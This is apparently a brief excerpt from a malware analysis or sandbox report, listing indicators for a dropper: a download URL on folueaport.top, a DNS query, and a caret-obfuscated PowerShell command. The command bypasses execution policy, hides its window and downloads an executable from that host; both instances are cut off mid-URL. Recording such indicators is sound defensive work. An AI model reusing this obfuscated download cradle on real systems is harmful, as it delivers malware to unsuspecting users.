Technical information
- http://folueaport.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OweR^s^h^ell^.exe ^-eX^EC^utIoNP^OL^IC^y^ by^p^A^s^S^ -nOPr^ofI^Le -^WinDoWST^Y^lE HiDdeN (n^EW^-o^bjE^Ct^ ^S^ySTEM.nEt^.^W^ebCl^iENT).do^WNLoad^f^ilE^(^'http://folueaport.top/re...
- DNS ASK fo###aport.top
- '<SYSTEM32>\cmd.exe' /c "P^OweR^s^h^ell^.exe ^-eX^EC^utIoNP^OL^IC^y^ by^p^A^s^S^ -nOPr^ofI^Le -^WinDoWST^Y^lE HiDdeN (n^EW^-o^bjE^Ct^ ^S^ySTEM.nEt^.^W^ebCl^iENT).do^WNLoad^f^ilE^(^'http://folueaport.top/re...' (with hidden window)